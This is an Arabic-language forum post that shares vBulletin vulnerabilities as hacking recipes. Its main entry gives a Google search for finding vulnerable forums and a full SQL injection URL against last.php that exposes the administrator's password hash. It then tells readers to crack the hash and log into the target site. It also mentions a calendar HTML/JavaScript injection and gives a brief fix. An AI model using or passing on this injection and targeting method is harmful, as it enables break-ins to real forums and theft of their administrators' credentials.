مجموعة ثغرات

السلام عليكم

هذي مجموعة ثغرات احب انبهكم لها

ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,


الـثغرة : من قام بتحميل هذا الملف ,,

نوع الثغرة : SQL Injection in vBulletin ,,

خـطورة الـثغرة : مرتفعة (( T0p )) ,,

معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,

الإصدارات المصابة :

جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,

>>> vBulletin 3.x.x ,,

################

كود الثـغرة :
كلمة البحث في قوقل :
شـرح الثغــرة ,,


يتبع


يعن تقدر تستخدم inject HTML/javascript codes



vBulletin Version 3.5.1

و

vBulletin Version 3.5.2

وهي في التقويم

واشتغلت تمام وهي سهله جداً

وهذا الاستغلال

ضعه بعد رابط المنتدى

الترقيع غير متوفر الان

لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم



يتبع




الثغرة في : منتديات vBulletin

الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3


ملف الثغرة : أخر عشر مواضيع

طريقة الإختراق :

إذهب إلى أي محرك بحث مثل google.com

وأكتب :

powered by: vbulletin version 3

أو

powered by: vbulletin version 2

إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود


last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201/*


بعد المنتدى مباشرة
بحيث يكون
http://www.[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*



مع العلم ان target
هي اسم الموقع المراد أختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php

بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع

وبعدها يطلع لك الباسوورد المشفر للمنتدى مع المشرف العام
ما عليك الا أستخدام أي برنامج لفك الشفره والدخول الى المنتدى

وبعد فك التشفير ماعليك إلا أن تدخل المنتدى

((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))

وان شاء الله اي ثغرات تنزل بنزلها هنا